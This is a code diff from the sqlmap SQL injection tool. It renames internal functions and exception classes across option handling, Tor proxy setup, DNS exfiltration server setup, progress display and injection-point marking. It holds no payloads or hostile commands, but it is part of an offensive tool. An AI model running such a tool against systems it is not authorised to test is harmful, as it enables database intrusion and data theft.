@ -1469,7 +1469,7 @@ def __setConfAttributes():
conf.trafficFP = None conf.trafficFP = None
conf.wFileType = None conf.wFileType = None
def __setKnowledgeBaseAttributes(flushAll=True): def _setKnowledgeBaseAttributes(flushAll=True):
""" """
This function set some needed attributes into the knowledge base This function set some needed attributes into the knowledge base
singleton. singleton.
@ -1604,7 +1604,7 @@ def __setKnowledgeBaseAttributes(flushAll=True):
kb.vulnHosts = set() kb.vulnHosts = set()
kb.wordlists = None kb.wordlists = None
def __useWizardInterface(): def _useWizardInterface():
""" """
Presents simple wizard interface for beginner users Presents simple wizard interface for beginner users
""" """
@ -1674,7 +1674,7 @@ def __useWizardInterface():
dataToStdout("\nsqlmap is running, please wait..\n\n") dataToStdout("\nsqlmap is running, please wait..\n\n")
def __saveCmdline(): def _saveCmdline():
""" """
Saves the command line options on a sqlmap configuration INI file Saves the command line options on a sqlmap configuration INI file
Format. Format.
@ -1730,7 +1730,7 @@ def __saveCmdline():
infoMsg = "saved command line options on '%s' configuration file" % paths.SQLMAP_CONFIG infoMsg = "saved command line options on '%s' configuration file" % paths.SQLMAP_CONFIG
logger.info(infoMsg) logger.info(infoMsg)
def __setVerbosity(): def _setVerbosity():
""" """
This function set the verbosity of sqlmap output messages. This function set the verbosity of sqlmap output messages.
""" """
@ -1756,7 +1756,7 @@ def __setVerbosity():
elif conf.verbose >= 5: elif conf.verbose >= 5:
logger.setLevel(CUSTOM_LOGGING.TRAFFIC_IN) logger.setLevel(CUSTOM_LOGGING.TRAFFIC_IN)
def __mergeOptions(inputOptions, overrideOptions): def _mergeOptions(inputOptions, overrideOptions):
""" """
Merge command line options with configuration file and default options. Merge command line options with configuration file and default options.
@ -1784,14 +1784,14 @@ def __mergeOptions(inputOptions, overrideOptions):
if conf[key] is None: if conf[key] is None:
conf[key] = value conf[key] = value
def __setTrafficOutputFP(): def _setTrafficOutputFP():
if conf.trafficFile: if conf.trafficFile:
infoMsg = "setting file for logging HTTP traffic" infoMsg = "setting file for logging HTTP traffic"
logger.info(infoMsg) logger.info(infoMsg)
conf.trafficFP = openFile(conf.trafficFile, "w+") conf.trafficFP = openFile(conf.trafficFile, "w+")
def __setDNSServer(): def _setDNSServer():
if not conf.dnsName: if not conf.dnsName:
return return
@ -1807,24 +1807,24 @@ def __setDNSServer():
except socket.error, msg: except socket.error, msg:
errMsg = "there was an error while setting up " errMsg = "there was an error while setting up "
errMsg += "DNS server instance ('%s')" % msg errMsg += "DNS server instance ('%s')" % msg
raise sqlmapGenericException, errMsg raise SqlmapGenericException, errMsg
else: else:
errMsg = "you need to run sqlmap as an administrator " errMsg = "you need to run sqlmap as an administrator "
errMsg += "if you want to perform a DNS data exfiltration attack " errMsg += "if you want to perform a DNS data exfiltration attack "
errMsg += "as it will need to listen on privileged UDP port 53 " errMsg += "as it will need to listen on privileged UDP port 53 "
errMsg += "for incoming address resolution attempts" errMsg += "for incoming address resolution attempts"
raise sqlmapMissingPrivileges, errMsg raise SqlmapMissingPrivileges, errMsg
def __setTorProxySettings(): def _setTorProxySettings():
if not conf.tor: if not conf.tor:
return return
if conf.torType == PROXY_TYPE.HTTP: if conf.torType == PROXY_TYPE.HTTP:
__setTorHttpProxySettings() _setTorHttpProxySettings()
else: else:
__setTorSocksProxySettings() _setTorSocksProxySettings()
def __setTorHttpProxySettings(): def _setTorHttpProxySettings():
infoMsg = "setting Tor HTTP proxy settings" infoMsg = "setting Tor HTTP proxy settings"
logger.info(infoMsg) logger.info(infoMsg)
@ -1854,7 +1854,7 @@ def __setTorHttpProxySettings():
else: else:
errMsg += "(e.g. http://www.coresec.org/2011/04/24/sqlmap-with-tor/)" errMsg += "(e.g. http://www.coresec.org/2011/04/24/sqlmap-with-tor/)"
raise sqlmapConnectionException, errMsg raise SqlmapConnectionException, errMsg
if not conf.checkTor: if not conf.checkTor:
warnMsg = "use switch '--check-tor' at " warnMsg = "use switch '--check-tor' at "
@ -1865,7 +1865,7 @@ def __setTorHttpProxySettings():
warnMsg += "(e.g. Vidalia)" warnMsg += "(e.g. Vidalia)"
logger.warn(warnMsg) logger.warn(warnMsg)
def __setTorSocksProxySettings(): def _setTorSocksProxySettings():
infoMsg = "setting Tor SOCKS proxy settings" infoMsg = "setting Tor SOCKS proxy settings"
logger.info(infoMsg) logger.info(infoMsg)
@ -1873,7 +1873,7 @@ def __setTorSocksProxySettings():
socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5 if conf.torType == PROXY_TYPE.SOCKS5 else socks.PROXY_TYPE_SOCKS4, LOCALHOST, conf.torPort or DEFAULT_TOR_SOCKS_PORT) socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5 if conf.torType == PROXY_TYPE.SOCKS5 else socks.PROXY_TYPE_SOCKS4, LOCALHOST, conf.torPort or DEFAULT_TOR_SOCKS_PORT)
socks.wrapmodule(urllib2) socks.wrapmodule(urllib2)
def __checkTor(): def _checkTor():
if not conf.checkTor: if not conf.checkTor:
return return
@ -1883,143 +1883,143 @@ def __checkTor():
page, _, _ = Request.getPage(url="https://check.torproject.org/", raise404=False) page, _, _ = Request.getPage(url="https://check.torproject.org/", raise404=False)
if not page or 'Congratulations' not in page: if not page or 'Congratulations' not in page:
errMsg = "it seems that Tor is not properly set. Please try using options '--tor-type' and/or '--tor-port'" errMsg = "it seems that Tor is not properly set. Please try using options '--tor-type' and/or '--tor-port'"
raise sqlmapConnectionException, errMsg raise SqlmapConnectionException, errMsg
else: else:
infoMsg = "Tor is properly being used" infoMsg = "Tor is properly being used"
logger.info(infoMsg) logger.info(infoMsg)
def __basicOptionValidation(): def _basicOptionValidation():
if conf.limitStart is not None and not (isinstance(conf.limitStart, int) and conf.limitStart > 0): if conf.limitStart is not None and not (isinstance(conf.limitStart, int) and conf.limitStart > 0):
errMsg = "value for option '--start' (limitStart) must be an integer value greater than zero (>0)" errMsg = "value for option '--start' (limitStart) must be an integer value greater than zero (>0)"
raise sqlmapSyntaxException, errMsg raise SqlmapSyntaxException, errMsg
if conf.limitStop is not None and not (isinstance(conf.limitStop, int) and conf.limitStop > 0): if conf.limitStop is not None and not (isinstance(conf.limitStop, int) and conf.limitStop > 0):
errMsg = "value for option '--stop' (limitStop) must be an integer value greater than zero (>0)" errMsg = "value for option '--stop' (limitStop) must be an integer value greater than zero (>0)"
raise sqlmapSyntaxException, errMsg raise SqlmapSyntaxException, errMsg
if conf.level is not None and not (isinstance(conf.level, int) and conf.level > 0): if conf.level is not None and not (isinstance(conf.level, int) and conf.level > 0):
errMsg = "value for option '--level' must be an integer value greater than zero (>0)" errMsg = "value for option '--level' must be an integer value greater than zero (>0)"
raise sqlmapSyntaxException, errMsg raise SqlmapSyntaxException, errMsg
if conf.risk is not None and not (isinstance(conf.risk, int) and conf.risk > 0): if conf.risk is not None and not (isinstance(conf.risk, int) and conf.risk > 0):
errMsg = "value for option '--risk' must be an integer value greater than zero (>0)" errMsg = "value for option '--risk' must be an integer value greater than zero (>0)"
raise sqlmapSyntaxException, errMsg raise SqlmapSyntaxException, errMsg
if conf.limitStart is not None and isinstance(conf.limitStart, int) and conf.limitStart > 0 and \ if conf.limitStart is not None and isinstance(conf.limitStart, int) and conf.limitStart > 0 and \
conf.limitStop is not None and isinstance(conf.limitStop, int) and conf.limitStop < conf.limitStart: conf.limitStop is not None and isinstance(conf.limitStop, int) and conf.limitStop < conf.limitStart:
errMsg = "value for option '--start' (limitStart) must be smaller or equal than value for --stop (limitStop) option" errMsg = "value for option '--start' (limitStart) must be smaller or equal than value for --stop (limitStop) option"
raise sqlmapSyntaxException, errMsg raise SqlmapSyntaxException, errMsg
if conf.firstChar is not None and isinstance(conf.firstChar, int) and conf.firstChar > 0 and \ if conf.firstChar is not None and isinstance(conf.firstChar, int) and conf.firstChar > 0 and \
conf.lastChar is not None and isinstance(conf.lastChar, int) and conf.lastChar < conf.firstChar: conf.lastChar is not None and isinstance(conf.lastChar, int) and conf.lastChar < conf.firstChar:
errMsg = "value for option '--first' (firstChar) must be smaller than or equal to value for --last (lastChar) option" errMsg = "value for option '--first' (firstChar) must be smaller than or equal to value for --last (lastChar) option"
raise sqlmapSyntaxException, errMsg raise SqlmapSyntaxException, errMsg
if conf.cpuThrottle is not None and isinstance(conf.cpuThrottle, int) and (conf.cpuThrottle > 100 or conf.cpuThrottle < 0): if conf.cpuThrottle is not None and isinstance(conf.cpuThrottle, int) and (conf.cpuThrottle > 100 or conf.cpuThrottle < 0):
errMsg = "value for option '--cpu-throttle' (cpuThrottle) must be in range [0,100]" errMsg = "value for option '--cpu-throttle' (cpuThrottle) must be in range [0,100]"
raise sqlmapSyntaxException, errMsg raise SqlmapSyntaxException, errMsg
if conf.textOnly and conf.nullConnection: if conf.textOnly and conf.nullConnection:
errMsg = "switch '--text-only' is incompatible with switch '--null-connection'" errMsg = "switch '--text-only' is incompatible with switch '--null-connection'"
raise sqlmapSyntaxException, errMsg raise SqlmapSyntaxException, errMsg
if conf.titles and conf.nullConnection: if conf.titles and conf.nullConnection:
errMsg = "switch '--titles' is incompatible with switch '--null-connection'" errMsg = "switch '--titles' is incompatible with switch '--null-connection'"
raise sqlmapSyntaxException, errMsg raise SqlmapSyntaxException, errMsg
if conf.data and conf.nullConnection: if conf.data and conf.nullConnection:
errMsg = "option '--data' is incompatible with switch '--null-connection'" errMsg = "option '--data' is incompatible with switch '--null-connection'"
raise sqlmapSyntaxException, errMsg raise SqlmapSyntaxException, errMsg
if conf.string and conf.nullConnection: if conf.string and conf.nullConnection:
errMsg = "option '--string' is incompatible with switch '--null-connection'" errMsg = "option '--string' is incompatible with switch '--null-connection'"
raise sqlmapSyntaxException, errMsg raise SqlmapSyntaxException, errMsg
if conf.notString and conf.nullConnection: if conf.notString and conf.nullConnection:
errMsg = "option '--not-string' is incompatible with switch '--null-connection'" errMsg = "option '--not-string' is incompatible with switch '--null-connection'"
raise sqlmapSyntaxException, errMsg raise SqlmapSyntaxException, errMsg
if conf.string and conf.notString: if conf.string and conf.notString:
errMsg = "option '--string' is incompatible with switch '--not-string'" errMsg = "option '--string' is incompatible with switch '--not-string'"
raise sqlmapSyntaxException, errMsg raise SqlmapSyntaxException, errMsg
if conf.regexp and conf.nullConnection: if conf.regexp and conf.nullConnection:
errMsg = "option '--regexp' is incompatible with switch '--null-connection'" errMsg = "option '--regexp' is incompatible with switch '--null-connection'"
raise sqlmapSyntaxException, errMsg raise SqlmapSyntaxException, errMsg
if conf.dumpTable and conf.dumpAll: if conf.dumpTable and conf.dumpAll:
errMsg = "switch '--dump' is incompatible with switch '--dump-all'" errMsg = "switch '--dump' is incompatible with switch '--dump-all'"
raise sqlmapSyntaxException, errMsg raise SqlmapSyntaxException, errMsg
if conf.predictOutput and (conf.threads > 1 or conf.optimize): if conf.predictOutput and (conf.threads > 1 or conf.optimize):
errMsg = "switch '--predict-output' is incompatible with option '--threads' and switch '-o'" errMsg = "switch '--predict-output' is incompatible with option '--threads' and switch '-o'"
raise sqlmapSyntaxException, errMsg raise SqlmapSyntaxException, errMsg
if conf.threads > MAX_NUMBER_OF_THREADS: if conf.threads > MAX_NUMBER_OF_THREADS:
errMsg = "maximum number of used threads is %d avoiding possible connection issues" % MAX_NUMBER_OF_THREADS errMsg = "maximum number of used threads is %d avoiding possible connection issues" % MAX_NUMBER_OF_THREADS
raise sqlmapSyntaxException, errMsg raise SqlmapSyntaxException, errMsg
if conf.forms and not conf.url: if conf.forms and not conf.url:
errMsg = "switch '--forms' requires usage of option '-u' (--url)" errMsg = "switch '--forms' requires usage of option '-u' (--url)"
raise sqlmapSyntaxException, errMsg raise SqlmapSyntaxException, errMsg
if conf.requestFile and conf.url: if conf.requestFile and conf.url:
errMsg = "option '-r' is incompatible with option '-u' (--url)" errMsg = "option '-r' is incompatible with option '-u' (--url)"
raise sqlmapSyntaxException, errMsg raise SqlmapSyntaxException, errMsg
if conf.tor and conf.ignoreProxy: if conf.tor and conf.ignoreProxy:
errMsg = "switch '--tor' is incompatible with switch '--ignore-proxy'" errMsg = "switch '--tor' is incompatible with switch '--ignore-proxy'"
raise sqlmapSyntaxException, errMsg raise SqlmapSyntaxException, errMsg
if conf.tor and conf.proxy: if conf.tor and conf.proxy:
errMsg = "switch '--tor' is incompatible with option '--proxy'" errMsg = "switch '--tor' is incompatible with option '--proxy'"
raise sqlmapSyntaxException, errMsg raise SqlmapSyntaxException, errMsg
if conf.checkTor and not any((conf.tor, conf.proxy)): if conf.checkTor and not any((conf.tor, conf.proxy)):
errMsg = "switch '--check-tor' requires usage of switch '--tor' (or option '--proxy' with HTTP proxy address using Tor)" errMsg = "switch '--check-tor' requires usage of switch '--tor' (or option '--proxy' with HTTP proxy address using Tor)"
raise sqlmapSyntaxException, errMsg raise SqlmapSyntaxException, errMsg
if conf.torPort is not None and not (isinstance(conf.torPort, int) and conf.torPort > 0): if conf.torPort is not None and not (isinstance(conf.torPort, int) and conf.torPort > 0):
errMsg = "value for option '--tor-port' must be a positive integer" errMsg = "value for option '--tor-port' must be a positive integer"
raise sqlmapSyntaxException, errMsg raise SqlmapSyntaxException, errMsg
if conf.torType not in getPublicTypeMembers(PROXY_TYPE, True): if conf.torType not in getPublicTypeMembers(PROXY_TYPE, True):
errMsg = "option '--tor-type' accepts one of following values: %s" % ", ".join(getPublicTypeMembers(PROXY_TYPE, True)) errMsg = "option '--tor-type' accepts one of following values: %s" % ", ".join(getPublicTypeMembers(PROXY_TYPE, True))
raise sqlmapSyntaxException, errMsg raise SqlmapSyntaxException, errMsg
if conf.dumpFormat not in getPublicTypeMembers(DUMP_FORMAT, True): if conf.dumpFormat not in getPublicTypeMembers(DUMP_FORMAT, True):
errMsg = "option '--dump-format' accepts one of following values: %s" % ", ".join(getPublicTypeMembers(DUMP_FORMAT, True)) errMsg = "option '--dump-format' accepts one of following values: %s" % ", ".join(getPublicTypeMembers(DUMP_FORMAT, True))
raise sqlmapSyntaxException, errMsg raise SqlmapSyntaxException, errMsg
if conf.skip and conf.testParameter: if conf.skip and conf.testParameter:
errMsg = "option '--skip' is incompatible with option '-p'" errMsg = "option '--skip' is incompatible with option '-p'"
raise sqlmapSyntaxException, errMsg raise SqlmapSyntaxException, errMsg
if conf.mobile and conf.agent: if conf.mobile and conf.agent:
errMsg = "switch '--mobile' is incompatible with option '--user-agent'" errMsg = "switch '--mobile' is incompatible with option '--user-agent'"
raise sqlmapSyntaxException, errMsg raise SqlmapSyntaxException, errMsg
if conf.proxy and conf.ignoreProxy: if conf.proxy and conf.ignoreProxy:
errMsg = "option '--proxy' is incompatible with switch '--ignore-proxy'" errMsg = "option '--proxy' is incompatible with switch '--ignore-proxy'"
raise sqlmapSyntaxException, errMsg raise SqlmapSyntaxException, errMsg
if conf.forms and any([conf.logFile, conf.bulkFile, conf.direct, conf.requestFile, conf.googleDork]): if conf.forms and any([conf.logFile, conf.bulkFile, conf.direct, conf.requestFile, conf.googleDork]):
errMsg = "switch '--forms' is compatible only with option '-u' (--url)" errMsg = "switch '--forms' is compatible only with option '-u' (--url)"
raise sqlmapSyntaxException, errMsg raise SqlmapSyntaxException, errMsg
if conf.timeSec < 1: if conf.timeSec < 1:
errMsg = "value for option '--time-sec' must be a positive integer" errMsg = "value for option '--time-sec' must be a positive integer"
raise sqlmapSyntaxException, errMsg raise SqlmapSyntaxException, errMsg
if conf.uChar and not re.match(UNION_CHAR_REGEX, conf.uChar): if conf.uChar and not re.match(UNION_CHAR_REGEX, conf.uChar):
errMsg = "value for option '--union-char' must be an alpha-numeric value (e.g. 1)" errMsg = "value for option '--union-char' must be an alpha-numeric value (e.g. 1)"
raise sqlmapSyntaxException, errMsg raise SqlmapSyntaxException, errMsg
if isinstance(conf.uCols, basestring): if isinstance(conf.uCols, basestring):
if not conf.uCols.isdigit() and ("-" not in conf.uCols or len(conf.uCols.split("-")) != 2): if not conf.uCols.isdigit() and ("-" not in conf.uCols or len(conf.uCols.split("-")) != 2):
errMsg = "value for option '--union-cols' must be a range with hyphon " errMsg = "value for option '--union-cols' must be a range with hyphon "
errMsg += "(e.g. 1-10) or integer value (e.g. 5)" errMsg += "(e.g. 1-10) or integer value (e.g. 5)"
raise sqlmapSyntaxException, errMsg raise SqlmapSyntaxException, errMsg
if conf.charset: if conf.charset:
_ = checkCharEncoding(conf.charset, False) _ = checkCharEncoding(conf.charset, False)
@ -2027,16 +2027,16 @@ def __basicOptionValidation():
errMsg = "unknown charset '%s'. Please visit " % conf.charset errMsg = "unknown charset '%s'. Please visit " % conf.charset
errMsg += "'%s' to get the full list of " % CODECS_LIST_PAGE errMsg += "'%s' to get the full list of " % CODECS_LIST_PAGE
errMsg += "supported charsets" errMsg += "supported charsets"
raise sqlmapSyntaxException, errMsg raise SqlmapSyntaxException, errMsg
else: else:
conf.charset = _ conf.charset = _
if conf.loadCookies: if conf.loadCookies:
if not os.path.exists(conf.loadCookies): if not os.path.exists(conf.loadCookies):
errMsg = "cookies file '%s' does not exist" % conf.loadCookies errMsg = "cookies file '%s' does not exist" % conf.loadCookies
raise sqlmapFilePathException, errMsg raise SqlmapFilePathException, errMsg
def __resolveCrossReferences(): def _resolveCrossReferences():
lib.core.threads.readInput = readInput lib.core.threads.readInput = readInput
lib.core.common.getPageTemplate = getPageTemplate lib.core.common.getPageTemplate = getPageTemplate
lib.core.convert.singleTimeWarnMessage = singleTimeWarnMessage lib.core.convert.singleTimeWarnMessage = singleTimeWarnMessage
@ -2052,54 +2052,54 @@ def init(inputOptions=AttribDict(), overrideOptions=False):
else: else:
if hasattr(LOGGER_HANDLER, "disable_coloring"): if hasattr(LOGGER_HANDLER, "disable_coloring"):
LOGGER_HANDLER.disable_coloring = True LOGGER_HANDLER.disable_coloring = True
__setConfAttributes() _setConfAttributes()
__setKnowledgeBaseAttributes() _setKnowledgeBaseAttributes()
__mergeOptions(inputOptions, overrideOptions) _mergeOptions(inputOptions, overrideOptions)
__useWizardInterface() _useWizardInterface()
__setVerbosity() _setVerbosity()
__saveCmdline() _saveCmdline()
__setRequestFromFile() _setRequestFromFile()
__cleanupOptions() _cleanupOptions()
__purgeOutput() _purgeOutput()
__checkDependencies() _checkDependencies()
__basicOptionValidation() _basicOptionValidation()
__setTorProxySettings() _setTorProxySettings()
__setDNSServer() _setDNSServer()
__adjustLoggingFormatter() _adjustLoggingFormatter()
__setMultipleTargets() _setMultipleTargets()
__setTamperingFunctions() _setTamperingFunctions()
__setTrafficOutputFP() _setTrafficOutputFP()
__resolveCrossReferences() _resolveCrossReferences()
parseTargetUrl() parseTargetUrl()
parseTargetDirect() parseTargetDirect()
if any((conf.url, conf.logFile, conf.bulkFile, conf.requestFile, conf.googleDork, conf.liveTest)): if any((conf.url, conf.logFile, conf.bulkFile, conf.requestFile, conf.googleDork, conf.liveTest)):
__setHTTPTimeout() _setHTTPTimeout()
__setHTTPExtraHeaders() _setHTTPExtraHeaders()
__setHTTPCookies() _setHTTPCookies()
__setHTTPReferer() _setHTTPReferer()
__setHTTPUserAgent() _setHTTPUserAgent()
__setHTTPMethod() _setHTTPMethod()
__setHTTPAuthentication() _setHTTPAuthentication()
__setHTTPProxy() _setHTTPProxy()
__setDNSCache() _setDNSCache()
__setSafeUrl() _setSafeUrl()
__setGoogleDorking() _setGoogleDorking()
__setBulkMultipleTargets() _setBulkMultipleTargets()
__urllib2Opener() __urllib2Opener()
__checkTor() _checkTor()
__setCrawler() _setCrawler()
__findPageForms() _findPageForms()
__setDBMS() _setDBMS()
__setTechnique() _setTechnique()
__setThreads() _setThreads()
__setOS() _setOS()
__setWriteFile() _setWriteFile()
__setMetasploit() _setMetasploit()
__setDBMSAuthentication() _setDBMSAuthentication()
loadPayloads() loadPayloads()
__setPrefixSuffix() _setPrefixSuffix()
update() update()
__loadQueries() _loadQueries()

26
lib/core/progress.py
View File

@ -15,8 +15,8 @@ class ProgressBar(object):
""" """
def __init__(self, minValue=0, maxValue=10, totalWidth=None): def __init__(self, minValue=0, maxValue=10, totalWidth=None):
self.__progBar = "[]" self._progBar = "[]"
self.__oldProgBar = "" self._oldProgBar = ""
self.__min = int(minValue) self.__min = int(minValue)
self.__max = int(maxValue) self.__max = int(maxValue)
self.__span = self.__max - self.__min self.__span = self.__max - self.__min
@ -24,7 +24,7 @@ class ProgressBar(object):
self.__amount = 0 self.__amount = 0
self.update() self.update()
def __convertSeconds(self, value): def _convertSeconds(self, value):
seconds = value seconds = value
minutes = seconds / 60 minutes = seconds / 60
seconds = seconds - (minutes * 60) seconds = seconds - (minutes * 60)
@ -56,34 +56,34 @@ class ProgressBar(object):
# Build a progress bar with an arrow of equal signs # Build a progress bar with an arrow of equal signs
if numHashes == 0: if numHashes == 0:
self.__progBar = "[>%s]" % (" " * (allFull - 1)) self._progBar = "[>%s]" % (" " * (allFull - 1))
elif numHashes == allFull: elif numHashes == allFull:
self.__progBar = "[%s]" % ("=" * allFull) self._progBar = "[%s]" % ("=" * allFull)
else: else:
self.__progBar = "[%s>%s]" % ("=" * (numHashes - 1), self._progBar = "[%s>%s]" % ("=" * (numHashes - 1),
" " * (allFull - numHashes)) " " * (allFull - numHashes))
# Add the percentage at the beginning of the progress bar # Add the percentage at the beginning of the progress bar
percentString = getUnicode(percentDone) + "%" percentString = getUnicode(percentDone) + "%"
self.__progBar = "%s %s" % (percentString, self.__progBar) self._progBar = "%s %s" % (percentString, self._progBar)
def draw(self, eta=0): def draw(self, eta=0):
""" """
This method draws the progress bar if it has changed This method draws the progress bar if it has changed
""" """
if self.__progBar != self.__oldProgBar: if self._progBar != self._oldProgBar:
self.__oldProgBar = self.__progBar self._oldProgBar = self._progBar
if eta and self.__amount < self.__max: if eta and self.__amount < self.__max:
dataToStdout("\r%s %d/%d ETA %s" % (self.__progBar, self.__amount, self.__max, self.__convertSeconds(int(eta)))) dataToStdout("\r%s %d/%d ETA %s" % (self._progBar, self.__amount, self.__max, self._convertSeconds(int(eta))))
else: else:
blank = " " * (80 - len("\r%s %d/%d" % (self.__progBar, self.__amount, self.__max))) blank = " " * (80 - len("\r%s %d/%d" % (self._progBar, self.__amount, self.__max)))
dataToStdout("\r%s %d/%d%s" % (self.__progBar, self.__amount, self.__max, blank)) dataToStdout("\r%s %d/%d%s" % (self._progBar, self.__amount, self.__max, blank))
def __str__(self): def __str__(self):
""" """
This method returns the progress bar string This method returns the progress bar string
""" """
return getUnicode(self.__progBar) return getUnicode(self._progBar)

8
lib/core/replication.py
View File

@ -9,8 +9,8 @@ import sqlite3
from extra.safe2bin.safe2bin import safechardecode from extra.safe2bin.safe2bin import safechardecode
from lib.core.common import unsafeSQLIdentificatorNaming from lib.core.common import unsafeSQLIdentificatorNaming
from lib.core.exception import sqlmapGenericException from lib.core.exception import SqlmapGenericException
from lib.core.exception import sqlmapValueException from lib.core.exception import SqlmapValueException
class Replication(object): class Replication(object):
""" """
@ -64,7 +64,7 @@ class Replication(object):
self.execute('INSERT INTO "%s" VALUES (%s)' % (self.name, ','.join(['?']*len(values))), safechardecode(values)) self.execute('INSERT INTO "%s" VALUES (%s)' % (self.name, ','.join(['?']*len(values))), safechardecode(values))
else: else:
errMsg = "wrong number of columns used in replicating insert" errMsg = "wrong number of columns used in replicating insert"
raise sqlmapValueException, errMsg raise SqlmapValueException, errMsg
def execute(self, sql, parameters=[]): def execute(self, sql, parameters=[]):
try: try:
@ -73,7 +73,7 @@ class Replication(object):
errMsg = "problem occurred ('%s') while accessing sqlite database " % ex errMsg = "problem occurred ('%s') while accessing sqlite database " % ex
errMsg += "located at '%s'. Please make sure that " % self.parent.dbpath errMsg += "located at '%s'. Please make sure that " % self.parent.dbpath
errMsg += "it's not used by some other program" errMsg += "it's not used by some other program"
raise sqlmapGenericException, errMsg raise SqlmapGenericException, errMsg
def beginTransaction(self): def beginTransaction(self):
""" """

86
lib/core/target.py
View File

@ -31,14 +31,14 @@ from lib.core.enums import HTTPHEADER
from lib.core.enums import HTTPMETHOD from lib.core.enums import HTTPMETHOD
from lib.core.enums import PLACE from lib.core.enums import PLACE
from lib.core.enums import POST_HINT from lib.core.enums import POST_HINT
from lib.core.exception import sqlmapFilePathException from lib.core.exception import SqlmapFilePathException
from lib.core.exception import sqlmapGenericException from lib.core.exception import SqlmapGenericException
from lib.core.exception import sqlmapMissingPrivileges from lib.core.exception import SqlmapMissingPrivileges
from lib.core.exception import sqlmapSyntaxException from lib.core.exception import SqlmapSyntaxException
from lib.core.exception import sqlmapUserQuitException from lib.core.exception import SqlmapUserQuitException
from lib.core.option import __setDBMS from lib.core.option import _setDBMS
from lib.core.option import __setKnowledgeBaseAttributes from lib.core.option import _setKnowledgeBaseAttributes
from lib.core.option import __setAuthCred from lib.core.option import _setAuthCred
from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
from lib.core.settings import HOST_ALIASES from lib.core.settings import HOST_ALIASES
from lib.core.settings import JSON_RECOGNITION_REGEX from lib.core.settings import JSON_RECOGNITION_REGEX
@ -55,7 +55,7 @@ from lib.utils.hashdb import HashDB
from lib.core.xmldump import dumper as xmldumper from lib.core.xmldump import dumper as xmldumper
from thirdparty.odict.odict import OrderedDict from thirdparty.odict.odict import OrderedDict
def __setRequestParams(): def _setRequestParams():
""" """
Check and set the parameters and perform checks on 'data' option for Check and set the parameters and perform checks on 'data' option for
HTTP method POST. HTTP method POST.
@ -79,7 +79,7 @@ def __setRequestParams():
# Perform checks on POST parameters # Perform checks on POST parameters
if conf.method == HTTPMETHOD.POST and conf.data is None: if conf.method == HTTPMETHOD.POST and conf.data is None:
errMsg = "HTTP POST method depends on HTTP data value to be posted" errMsg = "HTTP POST method depends on HTTP data value to be posted"
raise sqlmapSyntaxException, errMsg raise SqlmapSyntaxException, errMsg
if conf.data is not None: if conf.data is not None:
conf.method = HTTPMETHOD.POST conf.method = HTTPMETHOD.POST
@ -92,7 +92,7 @@ def __setRequestParams():
message += "Do you want to process it? [Y/n/q] " message += "Do you want to process it? [Y/n/q] "
test = readInput(message, default="Y") test = readInput(message, default="Y")
if test and test[0] in ("q", "Q"): if test and test[0] in ("q", "Q"):
raise sqlmapUserQuitException raise SqlmapUserQuitException
elif test[0] not in ("n", "N"): elif test[0] not in ("n", "N"):
conf.data = re.sub(r'("[^"]+"\s*:\s*"[^"]+)"', r'\g<1>%s"' % CUSTOM_INJECTION_MARK_CHAR, conf.data) conf.data = re.sub(r'("[^"]+"\s*:\s*"[^"]+)"', r'\g<1>%s"' % CUSTOM_INJECTION_MARK_CHAR, conf.data)
conf.data = re.sub(r'("[^"]+"\s*:\s*)(-?\d[\d\.]*\b)', r'\g<0>%s' % CUSTOM_INJECTION_MARK_CHAR, conf.data) conf.data = re.sub(r'("[^"]+"\s*:\s*)(-?\d[\d\.]*\b)', r'\g<0>%s' % CUSTOM_INJECTION_MARK_CHAR, conf.data)
@ -103,7 +103,7 @@ def __setRequestParams():
message += "Do you want to process it? [Y/n/q] " message += "Do you want to process it? [Y/n/q] "
test = readInput(message, default="Y") test = readInput(message, default="Y")
if test and test[0] in ("q", "Q"): if test and test[0] in ("q", "Q"):
raise sqlmapUserQuitException raise SqlmapUserQuitException
elif test[0] not in ("n", "N"): elif test[0] not in ("n", "N"):
conf.data = re.sub(r"(<([^>]+)( [^<]*)?>)([^<]+)(</\2)", r"\g<1>\g<4>%s\g<5>" % CUSTOM_INJECTION_MARK_CHAR, conf.data) conf.data = re.sub(r"(<([^>]+)( [^<]*)?>)([^<]+)(</\2)", r"\g<1>\g<4>%s\g<5>" % CUSTOM_INJECTION_MARK_CHAR, conf.data)
kb.postHint = POST_HINT.SOAP if "soap" in conf.data.lower() else POST_HINT.XML kb.postHint = POST_HINT.SOAP if "soap" in conf.data.lower() else POST_HINT.XML
@ -113,7 +113,7 @@ def __setRequestParams():
message += "Do you want to process it? [Y/n/q] " message += "Do you want to process it? [Y/n/q] "
test = readInput(message, default="Y") test = readInput(message, default="Y")
if test and test[0] in ("q", "Q"): if test and test[0] in ("q", "Q"):
raise sqlmapUserQuitException raise SqlmapUserQuitException
elif test[0] not in ("n", "N"): elif test[0] not in ("n", "N"):
conf.data = re.sub(r"(?si)(Content-Disposition.+?)((\r)?\n--)", r"\g<1>%s\g<2>" % CUSTOM_INJECTION_MARK_CHAR, conf.data) conf.data = re.sub(r"(?si)(Content-Disposition.+?)((\r)?\n--)", r"\g<1>%s\g<2>" % CUSTOM_INJECTION_MARK_CHAR, conf.data)
kb.postHint = POST_HINT.MULTIPART kb.postHint = POST_HINT.MULTIPART
@ -145,7 +145,7 @@ def __setRequestParams():
conf.url = "%s%s" % (conf.url, CUSTOM_INJECTION_MARK_CHAR) conf.url = "%s%s" % (conf.url, CUSTOM_INJECTION_MARK_CHAR)
kb.processUserMarks = True kb.processUserMarks = True
elif test[0] in ("q", "Q"): elif test[0] in ("q", "Q"):
raise sqlmapUserQuitException raise SqlmapUserQuitException
for place, value in ((PLACE.URI, conf.url), (PLACE.CUSTOM_POST, conf.data)): for place, value in ((PLACE.URI, conf.url), (PLACE.CUSTOM_POST, conf.data)):
if CUSTOM_INJECTION_MARK_CHAR in (value or ""): if CUSTOM_INJECTION_MARK_CHAR in (value or ""):
@ -155,7 +155,7 @@ def __setRequestParams():
message += "'%s'. Do you want to process it? [Y/n/q] " % _[place] message += "'%s'. Do you want to process it? [Y/n/q] " % _[place]
test = readInput(message, default="Y") test = readInput(message, default="Y")
if test and test[0] in ("q", "Q"): if test and test[0] in ("q", "Q"):
raise sqlmapUserQuitException raise SqlmapUserQuitException
else: else:
kb.processUserMarks = not test or test[0] not in ("n", "N") kb.processUserMarks = not test or test[0] not in ("n", "N")
@ -236,14 +236,14 @@ def __setRequestParams():
if not conf.parameters: if not conf.parameters:
